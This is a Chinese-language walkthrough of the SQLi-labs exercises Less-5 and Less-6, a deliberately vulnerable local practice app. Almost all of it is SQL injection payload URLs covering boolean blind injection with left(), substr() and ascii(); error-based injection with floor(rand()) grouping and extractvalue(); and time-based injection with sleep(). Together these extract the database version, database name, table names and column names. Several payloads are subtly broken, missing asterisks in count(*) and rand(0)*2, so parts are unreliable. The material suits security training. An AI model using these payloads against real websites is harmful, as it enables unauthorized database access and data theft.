LESS-5:
源码:
1、输入http://127.0.0.1/sqlilabs/Less-5/?id=1时没有出现错误:
2、输入http://127.0.0.1/sqlilabs/Less-5/?id=268,没有出现显示位,不能使用union语句
3、输入127.0.0.1/sqlilabs/Less-5/?id=1’
进行错误分析,出现错误’’1’’LIMIT 0,1’除去收尾和自己添加的一个’。还剩一对单引号,说明sql注入中以单引号闭合的。
一、盲注:
利用left()语句进行
http://127.0.0.1/sqlilabs/Less-5/?id=1' and left(version(),1)=5%20%23
出现这个表示版本正确,版本错误时,则输出利用length猜测数据库名的长度
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())=8%20%23
进行猜测数据库名的第一位:
http://127.0.0.1/sqlilabs/Less-5/?id=1' and left(database(),1)%3E%22a%22%23–+(可用二分法进行猜测)
猜测数据库第二位
得知第一位为 s的情况下:
http://127.0.0.1/sqlilabs/Less-5/?id=1' and left(database(),2)%3E%22sa%22%23–+
利用 substr() ascii()函数进行尝试(语法:substr(a,b,c)从 b 位置开始,截取字符串 a 的 c 长度。Ascii()将某个字符转换为 ascii 值)
下面猜测的是第一个表的第一个字符(采用2分法找到正确的值)
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))%3E80–+
可以使用 substr(**,2,1)来猜测同一个表中的第二个字符。
可以使用limit 2,1来进行第二个表的操作
二、页面出现错误可以使用报错注释:
推荐使用此篇博客进行理解:https://mochazz.github.io/2017/09/23/Double_ SQL_Injection/
输入:http://127.0.0.1/sqlilab/Less-5/?id=1’ union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)2))a from information_schema.columns group by a–+
http://127.0.0.1/sqlilabs/Less-5/?id=1’ union select 1,count(),concat(0x3a,0x3a,(select%20database()),0x3a,0x3a,floor(rand(0)*2))%20a%20from%20information_schema.columns%20group%20by%20a–+
只要修改第二个select后的内容就可以实现爆出自己所想要的值。
输入:
http://127.0.0.1/sqlilabs/Less-5/?id=1’ union Select 1,count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=”security” limit 3,1 ),0x3a,0x3a,floor(rand(0)2) a from information_schema.columns group by a --+
URL编码:
http://127.0.0.1/sqlilabs/Less-5/?id=1’ union Select 1,count(),concat(0x3a,0x3a,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%22security%22%20limit%203,1%20),0x3a,0x3a,floor(rand(0)2))%20a%20from%20information_schema.columns%20group%20by%20a%20–+
http://127.0.0.1/sqlilabs/Less-5/?id=1’ union Select 1,count(),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=”security” limit 0,1 ),0x3a,0x3a,floor(rand(0)2) a from information_schema.columns group by a --+
(改变的)
http://127.0.0.1/sqlilabs/Less-5/?id=1’ union select 1,count(),concat(0x3a,0x3a,(select%20column_name%20from%20information_schema.columns%20where%20table_name=%22users%22%20limit%201,1),0x3a,0x3a,floor(rand(0)*2))%20a%20from%20information_schema.columns%20group%20by%20a–+
另一种报错注入:(更简单,推荐)
http://127.0.0.1/sqlilabs/Less-5/?id=1’ and extractvalue(1,concat(0x7e,0x7e,( select database()),0x7e,0x7e))–+
http://127.0.0.1/sqlilabs/Less-5/?id=1’ and extractvalue (1,concat(0x7e,0x7e,(select table_name from information_schema.tables where table_schema=“security” limit 0,1),0x7e,0x7e))–+
延时注入:
1、利用 sleep()函数进行注入
sleep(n)表示强制停留n秒。但是使用这个办法是有前提条件的,也只指定条件的记录存在时才会停止指定的秒数,例如查询条件为name=‘pig’,结果表明记录不存在,执行时间为0。记录在,且存在几次就停留几次sleep(n);
http://127.0.0.1/sqlilabs/Less-5/?id=1’ and if(ascii(substr(database(),1,1))=115,1,sleep(5))–+
LESS-6
LESS-6与LESS-5类似,唯一的区别就是less-6为双引号:
源码:
http://127.0.0.1/sqlilabs/Less-6/?id=1"
可以看出是双引号闭合方式;
1、盲注
利用left()语句进行
http://127.0.0.1/sqlilabs/Less-6/?id=1" and left(version(),1)=5%23
2.报错注入:
http://127.0.0.1/sqlilabs/Less-6/?id=1" and extractvalue(1,concat(0x7E,(select database()),0x7E))–+
3、延时注入
http://127.0.0.1/sqlilabs/Less-6/?id=1" and if (ascii(substr(database(),1,1))=115,1,sleep(5))–+
http://127.0.0.1/sqlilabs/Less-6/?id=1" and if (ascii(substr(database(),1,1))=112,1,sleep(5))–+